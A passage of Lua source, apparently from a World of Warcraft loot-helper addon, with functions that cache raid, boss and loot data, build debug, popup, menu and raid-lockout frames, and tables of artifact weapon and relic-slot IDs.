			end
		end	
		
		return false
	end
		
	function ns.Cache_GetNumBosses(instanceID)

		for i=1, #LootHelperCache do 
			if LootHelperCache[i][1] == tonumber(instanceID) then 
				return #LootHelperCache[i][3]
			end
		end

		return 0
	end
	
	function ns.Cache_GetBossIDByIndex(instanceID, index)

		for i=1, #LootHelperCache do 
			if LootHelperCache[i][1] == tonumber(instanceID) then 
				return LootHelperCache[i][3][index][1]
			end
		end

		return false
	end
	
	function ns.Cache_GetInstanceIDByName(name)
		
		for i=1, #LootHelperCache do 
			if LootHelperCache[i][2] == name then 
				return LootHelperCache[i][1]
			end
		end
		
		return false
	end

	function ns.Cache_GetInstances() 
		return LootHelperCache
	end 

	local resetTimer
	local function ResetEvents()
		if(EncounterJournal) then
			EncounterJournal:RegisterEvent('EJ_LOOT_DATA_RECIEVED')
			EncounterJournal:RegisterEvent('EJ_DIFFICULTY_UPDATE')
		end

		resetTimer = nil
	end
	
	local function LG_GetBossInfo(bossID) 
		EJ_SelectEncounter(bossID)
		local list = {}
		for index = 1, EJ_GetNumLoot() do
			list[index] = EJ_GetLootInfoByIndex(index)
		end
		return list
	end 

	local function LH_GetInstanceInfo(instanceID) 
		EJ_SetDifficulty(16)
		EJ_SelectInstance(instanceID)
		EJ_SetLootFilter(0, 0)

		local bossList = {}

		local instName = EJ_GetInstanceInfo(instanceID, true)

		local bossIndex = 1
		local bossName, _, bossID, _, _, _, dungeonEncounterID, mapID = EJ_GetEncounterInfoByIndex(bossIndex);

		local itemList = LG_GetBossInfo(bossID) 

		bossList[#bossList+1] = { bossID, bossName, itemList, dungeonEncounterID, mapID }

		while bossID do
			bossIndex = bossIndex + 1
			bossName, _, bossID, _, _, _, dungeonEncounterID, mapID = EJ_GetEncounterInfoByIndex(bossIndex);

			if ( bossID ) then 				
				itemList = LG_GetBossInfo(bossID) 
			
				bossList[#bossList+1] = { bossID, bossName, itemList,dungeonEncounterID, mapID }
			end
		end

		return bossList
	end 

	local function GetRaidList()
		if(EncounterJournal) then
			EncounterJournal:UnregisterEvent('EJ_LOOT_DATA_RECIEVED')
			EncounterJournal:UnregisterEvent('EJ_DIFFICULTY_UPDATE')
		end

		table.wipe(LootHelperCache) 
		

		local currentTier = EJ_GetCurrentTier()
		local tierName = EJ_GetTierInfo(EJ_GetCurrentTier());

		EJ_SelectTier(currentTier);

		local raidList = {}
	
		local index = 1;
		local instanceID, name, description, _, buttonImage, _, _, _, link, shouldDisplayDifficulty = EJ_GetInstanceByIndex(index, true);

		if ( instanceID and shouldDisplayDifficulty ) then 

			local bossInfo = LH_GetInstanceInfo( instanceID )

			raidList[#raidList+1] = { instanceID, name, bossInfo }
			ns.RaidLock_AddToList(instanceID) 
		end 

		while instanceID do
			
			index = index + 1;
			instanceID, name, description, _, buttonImage, _, _, _, link, shouldDisplayDifficulty = EJ_GetInstanceByIndex(index, true);

			if ( instanceID and shouldDisplayDifficulty ) then 

				local bossInfo = LH_GetInstanceInfo( instanceID )
				raidList[#raidList+1] = { instanceID, name, bossInfo }
				ns.RaidLock_AddToList(instanceID) 
			end 
		end

		LootHelperCache = raidList

		collectgarbage('collect')

		if(resetTimer) then
			resetTimer:Cancel()
			resetTimer = nil
		end

		resetTimer = C_Timer.NewTimer(2, ResetEvents)
	end

	local testEventFrame = CreateFrame('Frame')
	testEventFrame:RegisterEvent('EJ_LOOT_DATA_RECIEVED')
	testEventFrame:RegisterEvent('EJ_DIFFICULTY_UPDATE')
	testEventFrame:SetScript('OnEvent', function(self, event, ...)
		-- print(event, ...)
	end) 

	function ns.Cache_InitUpdateLocale()
		GetRaidList()
	end
	
	
	function ns.Cache_GetEncounterName(id)
		for i=1, #LootHelperCache do 
			if LootHelperCache[i][1] == id then 
				return LootHelperCache[i][2]
			end
		end

		return false
	end
	
	function ns.Cache_GetBossName(id)
		
		for i=1, #LootHelperCache do 		
			for j=1, #LootHelperCache[i][3] do 
				if ( LootHelperCache[i][3][j][1] == id ) then 
					return LootHelperCache[i][3][j][2]
				end 
			end
		end	
	
		return false
	end
	
	function ns.Cache_GetItemIDInfo(itemID)

		for i=1, #LootHelperCache do 		
			for j=1, #LootHelperCache[i][3] do 		
				for k=1, #LootHelperCache[i][3][j][3] do 
					if ( LootHelperCache[i][3][j][3][k] == itemID ) then 
						return LootHelperCache[i][3][j][1],
							   LootHelperCache[i][1],
							   LootHelperCache[i][3][j][2],
							   LootHelperCache[i][2]
					end
				end
			end
		end	

		return false
	end
	
	function ns.Cache_StartCaching_Reset()
		LootHelperDB.LootHelperCache = {}
	end
end

if ns.debugUI then do
	local C = AleaUI_GUI
	C.LootHelper_debugFrames = {}
	
	local lastText = ''
	
	local listText = {}
	
	local function ShowMessage()
		
		local to = #listText
		local from = to - 50
		
		if from <= 0 then
			from = 1
		end
		
		lastText = ''
		
		for i=1, to do	
			lastText = lastText..listText[i]
		end
		
		C.LootHelper_debugFrames[1].main.infotext:SetText(lastText)
	end
	
	local function Update(self, panel, opts)
		
		self.free = false
		self:SetParent(panel)
		self:Show()	
		
		ShowMessage()
	end

	local function Remove(self)
		self.free = true
		self:Hide()
	end
	
	function ns.Debug_AddMessage(...)
		
		local num = select('#', ...)
		
		local msg = date("%H:%M:%S")
		
		for i=1, num do
			
			local arg = select(i, ...)
			
			if arg and type(arg) == 'string' then
				arg = arg:gsub('\n', '#n')
			end
			
			arg = tostring(arg)
			
			msg = msg..', '..arg
		end
		
		if num > 0 then
		
			table.insert(listText, msg..'\n')
		
			if C.LootHelper_debugFrames[1] and C.LootHelper_debugFrames[1].main.infotext:IsVisible() then
				ShowMessage()
			end
		end
	end
	
	local function CreateCoreButton(parent)
		local f = CreateFrame("Frame", nil, parent)
		f:SetSize(510, 310)
		f:SetFrameLevel(parent:GetFrameLevel() + 1)
		f.Scroll = CreateFrame("ScrollFrame", addOn.."DebugFramesScrollFrame", f, "UIPanelScrollFrameTemplate")
		f.Scroll:SetFrameLevel(f:GetFrameLevel() - 1)
		
		f.infotext = CreateFrame("EditBox", nil, f) 
		f.infotext:SetFontObject(ChatFontWhite)
		f.infotext:SetFont(ns.default_font, 12)
		f.infotext:SetFrameLevel(parent:GetFrameLevel())
		f.infotext:SetAutoFocus(false)
		f.infotext:SetWidth(800)
		f.infotext:SetHeight(300)	
		f.infotext:SetMultiLine(true)
		f.infotext:SetScript("OnEscapePressed", function(self)
			self:ClearFocus()
		end)
		f.infotext:SetScript('OnTextChanged', function(self, userInput)
			if userInput then				
				self:SetText(lastText)
			end
		end)
		
		f.Scroll:SetScrollChild(f.infotext)
		f.Scroll:SetPoint("TOPRIGHT", f, "TOPRIGHT", 0, -2)
		f.Scroll:SetPoint("TOPLEFT", f, "TOPLEFT", 0, -2)
		f.Scroll:SetPoint("BOTTOM", f, "BOTTOM", 0, 2)

		
		f.infotext:SetPoint('TOPLEFT', f.Scroll, "TOPLEFT", 11, 0)
		f.infotext:SetPoint('TOPRIGHT', f.Scroll, "TOPRIGHT", 0, 0)
		f.infotext:SetPoint("BOTTOM", f, "BOTTOM", 0, 2)
		f.infotext:SetHyperlinksEnabled(true)
		f.infotext:SetScript('OnHyperlinkClick', function(self, link, text, button)
			SetItemRef(link, text, button, self);
		end)
		
		
		f.Scroll:SetSize(505, 305)
		f.Scroll:SetHorizontalScroll(-5)
		f.Scroll:SetVerticalScroll(0)
		f.Scroll:EnableMouse(true)
		
		f.infotext:Show()
		f.Scroll:Show()
		f:Show()

		return f
	end

	function C:CreateLootHelper_DebugFrame()
		
		for i=1, #C.LootHelper_debugFrames do
			if C.LootHelper_debugFrames[i] then
				return C.LootHelper_debugFrames[i]
			end
		end
		
		local f = CreateFrame("Frame", nil, UIParent)
		f:SetSize(520, 320)
		f.free = true
		
		f.main = CreateCoreButton(f)
		f.main:ClearAllPoints()
		f.main:SetPoint("TOPLEFT", f, "TOPLEFT", 5, -5)
		f.main:SetPoint("BOTTOMRIGHT", f, "BOTTOMRIGHT", -25, 0)
		--[[
		f.bg = f:CreateTexture()
		f.bg:SetAllPoints()
		f.bg:SetTexture(1, 1, 0, 0.4)
		]]
		f.Update = Update
		f.Remove = Remove

		C.LootHelper_debugFrames[#C.LootHelper_debugFrames+1] = f
		
		return f
	end

	C.prototypes["LootHelper_DebugFrame"] = "CreateLootHelper_DebugFrame"
end end

do
	--[[ Start popup creation ]]--
	
	local width = ns.downloadLink:len()*10
	
	local frame = CreateFrame("Frame", nil, UIParent)

	frame:SetBackdrop({
			bgFile = [[Interface\Buttons\WHITE8x8]],
			edgeFile = [[Interface\Buttons\WHITE8x8]],
			edgeSize = 1,
			insets = {left = 0, right = 0, top = 0, bottom =0}
		})
	frame:SetBackdropColor(0 , 0 , 0 , 0.7) --цвет фона
	frame:SetBackdropBorderColor(0 , 0 , 0 , 1) --цвет фона
	
	frame:SetSize(width, 40)
	frame:SetPoint("CENTER", UIParent, "CENTER")
	frame:SetFrameStrata("DIALOG")
	frame:Hide()

	local editBox = CreateFrame("EditBox", nil, frame)
	editBox:SetFontObject(ChatFontNormal)
	editBox:SetSize(width-40, 40)
	editBox:SetPoint("LEFT", frame, "LEFT", 10, 0)
	local hide = function(f) f:GetParent():Hide() end
	editBox:SetScript("OnEscapePressed", hide)
	editBox:SetScript('OnTextChanged', function(self, userInput)
		if userInput and self.lastText then				
			self:SetText(self.lastText)
		end
	end)
	
	local fsting = editBox:CreateFontString()
	fsting:SetFontObject(ChatFontNormal)
	fsting:SetFont(STANDARD_TEXT_FONT, 12, 'NONE')
	fsting:SetPoint("RIGHT", editBox, "RIGHT", -10, 0)
	fsting:SetText('|cFF606060Ctrl+C - '..L['COPY']..'\nCtrl+V - '..L['PASTE']..'|r')
	fsting:SetJustifyH('LEFT')
	
	local close_ = CreateFrame("Button", nil, frame)
	close_:SetNormalTexture("Interface\\Buttons\\UI-Panel-MinimizeButton-Up")
	close_:SetPushedTexture("Interface\\Buttons\\UI-Panel-MinimizeButton-Down")
	close_:SetHighlightTexture("Interface\\Buttons\\UI-Panel-MinimizeButton-Highlight", "ADD")
	close_:SetSize(32, 32)
	close_:SetPoint("RIGHT", frame, "RIGHT", -5, 0)
	close_:SetScript("OnClick", hide)
	--[[ End popup creation ]]--

	-- Avoiding StaticPopup taints by making our own popup, rather that adding to the StaticPopup list
	function ns:Popup(text)
		editBox.lastText = text
		editBox:SetText(text)
		editBox:HighlightText(0)
		editBox:GetParent():Show()
	end
end

do
	local lineHeight = 14
	local headerHeight = 0
	local lineGap = 3
	local disabledHeight = 2
	
	local menu = CreateFrame('Frame', nil)
	menu:EnableMouse(true)
	menu:SetSize(100, 20)
	menu:SetClampedToScreen(true)
	menu.buttons = {}
	menu:SetFrameStrata('TOOLTIP')
	menu:SetFrameLevel(20)
	menu.background = menu:CreateTexture(nil, 'OVERLAY')
	menu.background:SetAllPoints()
	menu.background:SetTexture(0,0,0,0.8)
	
	local function MenuButton_OnEnter(self)	
		if self.disabled then return end
		self.highlight:Show()
	end
	
	local function MenuButton_OnLeave(self)	
		self.highlight:Hide()
	end
	
	local function MenuButton_OnClick(self)	
		if self.disabled then return end
		
		if self.func then
			self.func(self)
		end
		
		menu:Hide()
	end
	
	local function MenuButton_OnMouseUp(self)
	
		self.text:SetPoint('TOPLEFT', self, 'TOPLEFT', 0, 0)
		self.text:SetPoint('BOTTOMRIGHT', self, 'BOTTOMRIGHT', 0, 0)
	end
	
	local function MenuButton_OnMouseDown(self)
		if self.disabled then return end
		self.text:SetPoint('TOPLEFT', self, 'TOPLEFT', 1, -1)
		self.text:SetPoint('BOTTOMRIGHT', self, 'BOTTOMRIGHT', 1, -1)
	end
	
	local function MenuButton_Cancel()
		menu:Hide()
	end
	
	local function CreateMenuButtons(i)
		local f = CreateFrame('Button', nil, menu)
		f:SetSize(100, lineHeight)
		f:SetFrameStrata('TOOLTIP')
		f:SetFrameLevel(menu:GetFrameLevel()+1)
		
		f.text = f:CreateFontString(nil, 'OVERLAY')
		f.text:SetPoint('TOPLEFT', f, 'TOPLEFT', 0, 0)
		f.text:SetPoint('BOTTOMRIGHT', f, 'BOTTOMRIGHT', 0, 0)
		f.text:SetFontObject('GameFontWhite')
		
		f.highlight = f:CreateTexture(nil, "ARTWORK")
		f.highlight:SetTexture("Interface\\QuestFrame\\UI-QuestTitleHighlight") --"Interface\\Buttons\\UI-Common-MouseHilight")
		f.highlight:SetBlendMode("ADD")
		f.highlight:Hide()
		f.highlight:SetAlpha(0.7)

		f.highlight:SetPoint("LEFT",   f, "LEFT",   0, 1)
		f.highlight:SetPoint("RIGHT",  f, "RIGHT",  0, -1)
		f.highlight:SetPoint("TOP",    f, "TOP",    0, 0)
		f.highlight:SetPoint("BOTTOM", f, "BOTTOM", 0, 0)
		
		f:SetScript('OnEnter', MenuButton_OnEnter)
		f:SetScript('OnLeave', MenuButton_OnLeave)
		f:SetScript('OnClick', MenuButton_OnClick)
		f:SetScript("OnMouseUp", MenuButton_OnMouseUp)
		f:SetScript("OnMouseDown", MenuButton_OnMouseDown)
		
		if menu.buttons[i-1] then
			f:SetPoint('TOP', menu.buttons[i-1], 'BOTTOM', 0, -lineGap)
		else
			f:SetPoint('TOP', menu, 'TOP', 0, -headerHeight-lineHeight)
		end
		
		menu.buttons[i] = f
		
		return f
	end
	
	function ns.HideMenu()	
		menu:Hide()
	end
	
	
	local menuFrame = CreateFrame("Frame", "LootHelperDatatextClickMenu", UIParent, "UIDropDownMenuTemplate")
	
	
	function ns.ShowMenu(parent, menuList)
		
		if true then
				
			EasyMenu(menuList, menuFrame, "cursor", -15, -7, "MENU", 2)
			return
		end
		
		
		if #menuList == 0 then 
			return 
		end
		
		menu:SetParent(parent:GetParent())
		menu:ClearAllPoints()
		menu:SetPoint('TOP', parent, 'BOTTOM', 0, 0)
		
		for i=1, #menu.buttons do
			menu.buttons[i].disabled = nil
			menu.buttons[i]:Hide()
		end
		
		local numButtons = 0
		local height = headerHeight+lineHeight
		
		for i=1, #menuList do
			numButtons = numButtons + 1
			
			local button = menu.buttons[i] or CreateMenuButtons(i)
			
			button.text:SetText(menuList[i].name)
			button.onClick = menuList[i].onClick
			button.disabled = menuList[i].disabled
			button:SetHeight(lineHeight)
			
			if button.disabled and button.isTitle ~= true then
				button:SetHeight(disabledHeight)
			end
			
			height = height + button:GetHeight() + lineGap

			button:Show()
			
			menu.buttons[i] = button
		end
		
		height = height + headerHeight
		
		menu:SetHeight(height)
		
		menu:Show()
		
		return menu
	end

end

do
	
	local C = AleaUI_GUI
	C.LootHelper_lockOutFrames = {}
	
	-- ns:GetUnitFullName(unit)
	local eventHandler = CreateFrame('Frame')
	eventHandler:SetScript('OnUpdate', function(self, elapsed)
		self.elapsed = ( self.elapsed or 0 ) + elapsed
		if self.elapsed < 1 then return end
		self.elapsed = 0
		
		if not C.LootHelper_lockOutFrames[1].main:IsVisible() then 
			self:Hide()
			return 
		end
		
		local raidID = ns.ForceShowRaidLockOut or ns:Client_GetEncounterLockoutID()
		
		local numMembers = IsInRaid() and GetNumGroupMembers() or 0
		
		local numBosses = 0
		
		if raidID then
			local raid = strsplit('_', raidID)
			numBosses = ns.Cache_GetNumBosses(raid) or 0
		end
		
		local width = numBosses > 0 and 80/numBosses or 80
		
		for i=1, numMembers do
			local name1, server = ns:GetUnitFullName('raid'..i)
			local tag = name1..'-'..server
			local name = ns.GetColoredName('raid'..i)
			
			local numBossesPlayer = ns:Client_GetEncounterLockoutBossNumber(raidID, tag)
			local lockout = ns:Client_GetEncounterLockoutInfoFast(raidID, tag)

			
			if lockout == 0 then -- with no raid info
				C.LootHelper_lockOutFrames[1].main.frames[i].texture:SetColorTexture(0.4,0.4,0,1)
				C.LootHelper_lockOutFrames[1].main.frames[i].bg:SetColorTexture(0.2,0.2,0,1)
			elseif lockout == 1 then -- with no lockout
				C.LootHelper_lockOutFrames[1].main.frames[i].texture:SetColorTexture(0,0.4,0,1)
				C.LootHelper_lockOutFrames[1].main.frames[i].bg:SetColorTexture(0,0.2,0,1)
			elseif lockout == 2 then -- with cooldown
				C.LootHelper_lockOutFrames[1].main.frames[i].texture:SetColorTexture(0.4,0,0,1)
				C.LootHelper_lockOutFrames[1].main.frames[i].bg:SetColorTexture(0.2,0.0,0,1)
			elseif lockout == -1 then -- with no data
				C.LootHelper_lockOutFrames[1].main.frames[i].texture:SetColorTexture(0.4, 0.4, 0.4,1)
				C.LootHelper_lockOutFrames[1].main.frames[i].texture:SetColorTexture(0.2, 0.2, 0.2,1)
			end
		
			C.LootHelper_lockOutFrames[1].main.frames[i].texture:SetWidth( numBossesPlayer > 0 and width*(numBosses - numBossesPlayer) or 80)
			
			C.LootHelper_lockOutFrames[1].main.frames[i].tag = tag
			C.LootHelper_lockOutFrames[1].main.frames[i].raidID = raidID
			C.LootHelper_lockOutFrames[1].main.frames[i].name:SetText(name)
			C.LootHelper_lockOutFrames[1].main.frames[i]:Show()
		end
		
		for i=numMembers+1 , 40 do
			C.LootHelper_lockOutFrames[1].main.frames[i].tag = nil
			C.LootHelper_lockOutFrames[1].main.frames[i].raidID = nil
			C.LootHelper_lockOutFrames[1].main.frames[i]:Hide()
		end
	end)
	eventHandler:Hide()
	
	local function Update(self, panel, opts)
		
		self.free = false
		self:SetParent(panel)
		self:Show()	
		
		eventHandler:Show()
		eventHandler.elapsed = 2
	end
	
	local function UpdateSize(self, panel, opts, parent)	
		if opts.width == 'full' then
			if parent then
				self:SetWidth( parent:GetWidth() - 15)
				self.main:SetWidth( parent:GetWidth() - 15)
			else
				self:SetWidth( panel:GetWidth() - 25)
				self.main:SetWidth( panel:GetWidth() - 25)
			end
		else
			self:SetWidth(520)
			self.main:SetWidth(520)
		end
	end
	
	local function Remove(self)
		self.free = true
		self:Hide()
		
		eventHandler:Hide()
	end
	

	local function CreateCoreButton(parent)
		local f = CreateFrame("Frame", nil, parent)
		f:SetSize(510, 310)
		f:SetFrameLevel(parent:GetFrameLevel() + 1)
		
		f.frames = {}
		
		for i=1, 40 do
		
			local button = CreateFrame("Frame", nil, f)
			button:SetSize(80, 16)
			
			button.name = button:CreateFontString(nil, 'OVERLAY')
			button.name:SetFont(STANDARD_TEXT_FONT, 12, 'OUTLINE')
			button.name:SetText('Button'..i)
			button.name:SetPoint('CENTER', button, 'CENTER', 0, 0)
			
			button.texture = button:CreateTexture(nil, 'ARTWORK')
			button.texture:SetDrawLayer('ARTWORK', 1)
			button.texture:SetColorTexture(0,0.4,0,1)
			button.texture:SetPoint('LEFT', button, 'LEFT', 0, 0)
			button.texture:SetSize(80, 16)
			
			button.bg = button:CreateTexture(nil, 'ARTWORK')
			button.bg:SetDrawLayer('ARTWORK', 0)
			button.bg:SetColorTexture(0.1,0.1,0.1,1)
			button.bg:SetAllPoints()
			
			button:SetScript('OnEnter', function(self)
				if self.tag and self.raidID then
			--		print(self.tag, self.raidID, 'OnEnter')	
					GameTooltip:SetOwner(self, "ANCHOR_BOTTOMLEFT")
					GameTooltip:ClearLines()
					
					ns:Client_FillGameTooltip(self.raidID, self.tag, GameTooltip)
					GameTooltip:Show()
				end
			end)
			button:SetScript('OnLeave', function(self)
				GameTooltip:Hide()
			end)
			
			if i == 1 then
				button:SetPoint('TOPLEFT', f, 'TOPLEFT', 0, 0)
			elseif i%4 == 1 then
				button:SetPoint('TOP', f.frames[i-4], 'BOTTOM', 0, -10)
			else
				button:SetPoint('LEFT', f.frames[i-1], 'RIGHT', 10, 0)
			end

			f.frames[i] = button
		end
		
		f:SetScript('OnSizeChanged', function(self, width, height)
		--	print('Changed size ', width, height)
		end)
		
		f:Show()

		return f
	end

	function C:CreateLootHelper_LockOutFrame()
		
		for i=1, #C.LootHelper_lockOutFrames do
			if C.LootHelper_lockOutFrames[i] then
				return C.LootHelper_lockOutFrames[i]
			end
		end
		
		local f = CreateFrame("Frame", nil, UIParent)
		f:SetSize(520, 320)
		f.free = true
		
		f.main = CreateCoreButton(f)
		f.main:ClearAllPoints()
		f.main:SetPoint("TOPLEFT", f, "TOPLEFT", 5, -5)
		f.main:SetPoint("BOTTOMRIGHT", f, "BOTTOMRIGHT", -25, 0)
		--[[
		f.bg = f:CreateTexture()
		f.bg:SetAllPoints()
		f.bg:SetTexture(1, 1, 0, 0.4)
		]]
		f.Update = Update
		f.Remove = Remove
		f.UpdateSize = UpdateSize
		
		C.LootHelper_lockOutFrames[#C.LootHelper_lockOutFrames+1] = f
		
		return f
	end

	C.prototypes["LootHelper_LockOutFrame"] = "CreateLootHelper_LockOutFrame"
end

ns.RelicTypes = {
	["Blood"] = RELIC_SLOT_TYPE_BLOOD,
	["Shadow"] = RELIC_SLOT_TYPE_SHADOW,
	["Iron"] = RELIC_SLOT_TYPE_IRON,
	["Frost"] = RELIC_SLOT_TYPE_FROST,
	["Fire"] = RELIC_SLOT_TYPE_FIRE,
	["Fel"] = RELIC_SLOT_TYPE_FEL,
	["Arcane"] = RELIC_SLOT_TYPE_ARCANE,
	["Life"] = RELIC_SLOT_TYPE_LIFE,
	["Wind"] = RELIC_SLOT_TYPE_WIND,
	["Holy"] = RELIC_SLOT_TYPE_HOLY,
}

ns.ArtifactsPerClass = {
	['DEMONHUNTER'] = { 127829, 128832 },
	['DEATHKNIGHT'] = { 128402, 128292, 128403 },
	['DRUID']		= { 128858, 128860, 128821, 128306},
	['HUNTER']		= { 128861, 128826, 128808 },
	['MAGE']		= { 127857, 128820, 128862 },
	['MONK']		= { 128938, 128937, 128940 },
	['PALADIN']		= { 128823, 128866, 120978 },
	['PRIEST']		= { 128868, 128825, 128827 },
	['ROGUE']		= { 128870, 128872, 128476 },
	['SHAMAN'] 		= { 128935, 128819, 128911 },
	['WARLOCK']		= { 128942, 128943, 128941 },
	['WARRIOR']		= { 128910, 128908, 128289 },
}

ns.RelicSlots = {
	[127829] = { "Fel","Shadow","Fel"}, -- Havoc DH
	[128832] = {"Iron","Arcane","Fel"}, -- Vengeance DH

	[128402] = {"Blood","Shadow","Iron"}, -- Blood DK
	[128292] = {"Frost","Shadow","Frost"}, -- Frost DK
	[128403] = {"Fire","Shadow","Blood"}, -- Unholy DK

	[128858] = {"Arcane","Life","Arcane"}, -- Balance Druid
	[128860] = {"Frost","Blood","Life"}, -- Feral Druid
	[128821] = {"Fire","Blood","Life"}, -- Guardian Druid
	[128306] = {"Life","Frost","Life"}, -- Restoration Druid

	[128861] = {"Wind","Arcane","Iron"}, -- Beast Mastery Hunter
	[128826] = {"Wind","Blood","Life"}, -- Marksmanship Hunter
	[128808] = {"Wind","Iron","Blood"}, -- Survival Hunter

	[127857] = {"Arcane","Frost","Arcane"}, -- Arcane Mage
	[128820] = {"Fire","Arcane","Fire"}, -- Fire Mage
	[128862] = {"Frost","Arcane","Frost"}, -- Frost Mage

	[128938] = {"Life","Wind","Iron"}, -- Brewmaster Monk
	[128937] = {"Frost","Life","Wind"}, -- Mistweaver Monk
	[128940] = {"Wind","Iron","Wind"}, -- Windwalker Monk

	[128823] = {"Holy","Life","Holy"}, -- Holy Paladin
	[128866] = {"Holy","Iron","Arcane"}, -- Protection Paladin
	[120978] = {"Holy","Fire","Holy"}, -- Retribution Paladin

	[128868] = {"Holy","Shadow","Holy"}, -- Discipline Priest
	[128825] = {"Holy","Life","Holy"}, -- Holy Priest
	[128827] = {"Shadow","Blood","Shadow"}, -- Shadow Priest

	[128870] = {"Shadow","Iron","Blood"}, -- Assassination Rogue
	[128872] = {"Blood","Iron","Wind"}, -- Outlaw Rogue
	[128476] = {"Fel","Shadow","Fel"}, -- Subtlety Rogue

	[128935] = {"Wind","Frost","Wind"}, -- Elemental Shaman
	[128819] = {"Fire","Iron","Wind"}, -- Enhancement Shaman
	[128911] = {"Life","Frost","Life"}, -- Restoration Shaman

	[128942] = {"Shadow","Blood","Shadow"}, -- Affliction Warlock
	[128943] = {"Shadow","Fire","Fel"}, -- Demonology Warlock
	[128941] = {"Fel","Fire","Fel"}, -- Destruction Warlock

	[128910] = {"Iron","Blood","Shadow"}, -- Arms Warrior
	[128908] = {"Fire","Wind","Iron"}, -- Fury Warrior
	[128289] = {"Iron","Blood","Fire"}, -- Protection Warrior
}

ns.Artifacts = {
	[127829] = 577, -- Havoc DH
	[128832] = 581, -- Vengeance DH

	[128402] = 250, -- Blood DK
	[128292] = 251, -- Frost DK
	[128403] = 252, -- Unholy DK

	[128858] = 102, -- Balance Druid
	[128860] = 103, -- Feral Druid
	[128821] = 104, -- Guardian Druid
	[128306] = 105, -- Restoration Druid

	[128861] = 253, -- Beast Mastery Hunter
	[128826] = 254, -- Marksmanship Hunter
	[128808] = 255, -- Survival Hunter

	[127857] = 62, -- Arcane Mage
	[128820] = 63, -- Fire Mage
	[128862] = 64, -- Frost Mage

	[128938] = 268, -- Brewmaster Monk
	[128937] = 270, -- Mistweaver Monk
	[128940] = 269, -- Windwalker Monk

	[128823] = 65, -- Holy Paladin
	[128866] = 66, -- Protection Paladin
	[120978] = 70, -- Retribution Paladin

	[128868] = 256, -- Discipline Priest
	[128825] = 257, -- Holy Priest
	[128827] = 258, -- Shadow Priest

	[128870] = 259, -- Assassination Rogue
	[128872] = 260, -- Outlaw Rogue
	[128476] = 261, -- Subtlety Rogue

	[128935] = 262, -- Elemental Shaman
	[128819] = 263, -- Enhancement Shaman
	[128911] = 264, -- Restoration Shaman

	[128942] = 265, -- Affliction Warlock
	[128943] = 266, -- Demonology Warlock
	[128941] = 267, -- Destruction Warlock

	[128910] = 71, -- Arms Warrior
	[128908] = 72, -- Fury Warrior
	[128289] = 73, -- Protection Warrior	
}

do
	local artifactData = {
		equipped = {},		
		artifacts = {},
	}
	
	local initUpdate = true
	
	local function CTimer_AfterUpdate()
		initUpdate = true
		
		local _, class = UnitClass('player')

		if ns.ArtifactsPerClass[class] then
			
			for i = 16, 18, 1 do 
				if ns.Artifacts[GetInventoryItemID("player", i)] then
					local link = GetInventoryItemLink("player", i)
					
					local _, relicLink1 = GetItemGem(link, 1)
					local _, relicLink2 = GetItemGem(link, 2)
					local _, relicLink3 = GetItemGem(link, 3)
					
			--		print('Find artifact equpped:', link, 'R1:',relicLink1, 'R2:', relicLink2, 'R3:', relicLink3)		
					
					artifactData.equipped = {
						relicLink1,
						relicLink2,
						relicLink3
					}
				
					artifactData.artifacts[GetInventoryItemID("player", i)] = {
						equipped = true,
						link = link,
						relicLink1 = relicLink1,
						relicLink2 = relicLink2,
						relicLink3 = relicLink3,
						relicType1 = relicLink1 and select(3, C_ArtifactUI.GetRelicInfoByItemID(ns.GetItemID(relicLink1))),
						relicType2 = relicLink2 and select(3, C_ArtifactUI.GetRelicInfoByItemID(ns.GetItemID(relicLink2))),
						relicType3 = relicLink3 and select(3, C_ArtifactUI.GetRelicInfoByItemID(ns.GetItemID(relicLink3))),
					}
				end
			end
			
			for i = 0, 4, 1 do -- (db.hidebag and -1) or
				for j = 1, GetContainerNumSlots(i), 1 do
					if ns.Artifacts[GetContainerItemID(i, j)] then
						local link = GetContainerItemLink(i, j)
						local _, relicLink1 = GetItemGem(link, 1)
						local _, relicLink2 = GetItemGem(link, 2)
						local _, relicLink3 = GetItemGem(link, 3)
						
						artifactData.artifacts[GetContainerItemID(i, j)] = {
							equipped = false,
							link = link,
							relicLink1 = relicLink1,
							relicLink2 = relicLink2,
							relicLink3 = relicLink3,
							relicType1 = relicLink1 and select(3, C_ArtifactUI.GetRelicInfoByItemID(ns.GetItemID(relicLink1))),
							relicType2 = relicLink2 and select(3, C_ArtifactUI.GetRelicInfoByItemID(ns.GetItemID(relicLink2))),
							relicType3 = relicLink3 and select(3, C_ArtifactUI.GetRelicInfoByItemID(ns.GetItemID(relicLink3))),
						}
				--		print('Find artifact in bags', link, 'R1:',relicLink1, 'R2:', relicLink2, 'R3:', relicLink3)
					end
				end
			end
		end
	end
	
	local artifactLoader = CreateFrame('Frame')	
		artifactLoader:RegisterEvent('PLAYER_LOGIN')
		artifactLoader:RegisterEvent('PLAYER_SPECIALIZATION_CHANGED')
		artifactLoader:RegisterEvent("PLAYER_EQUIPMENT_CHANGED")
		artifactLoader:RegisterEvent("ARTIFACT_CLOSE")
		
		artifactLoader:SetScript("OnEvent", function(self, event, unit)
		
			if event == 'PLAYER_SPECIALIZATION_CHANGED' then
				if unit == 'player' or not unit then
				
				else
					return
				end
			end
			
			if initUpdate then
				initUpdate = false
			--	print('T', event, unit)
				C_Timer.After(0.5, CTimer_AfterUpdate)
			end
		end)
		
	function ns.GetEquppedArtifactData()	
		return artifactData.equipped
	end
	
	function ns.GetArtifactsByType(relicType)
		local item1
		local item2
		local item3
		local item4
		
		for k,v in pairs(artifactData.artifacts) do	
			if v.equipped then
				if v.relicType1 == relicType or v.relicType2 == relicType or v.relicType3 == relicType then
					if not item1 then
						item1 = v.link
					elseif not item2 then
						item2 = v.link
					elseif not item3 then
						item3 = v.link
					elseif not item4 then
						item4 = v.link
					end
				end
			end
		end
		
		for k,v in pairs(artifactData.artifacts) do	
			if not v.equipped then
				if v.relicType1 == relicType or v.relicType2 == relicType or v.relicType3 == relicType then
					if not item1 then
						item1 = v.link
					elseif not item2 then
						item2 = v.link
					elseif not item3 then
						item3 = v.link
					elseif not item4 then
						item4 = v.link
					end
				end
			end
		end
		
		return item1, item2, item3, item4
	end
	
	
	ns.queueRelicPowerGain = {}
	
	
--	local channelNameRelicNewInfo = 'LHRNI'
--	if not IsAddonMessagePrefixRegistered(channelNameRelicNewInfo) then
--		RegisterAddonMessagePrefix(channelNameRelicNewInfo)
--	end
--	ns.channelNameRelicNewInfo = channelNameRelicNewInfo
	
	
	-- ns:SendMessage(msg, tag)
	--  ns.RelicSync_GetNewItemInfo(cmsg, author, tag)
	
	function ns.RelicSync_GetNewItemInfo(info, author)	
	--	print('RelicSync_GetNewItemInfo', info, author)
		
		local relicData = { strsplit('\n', info) }
		
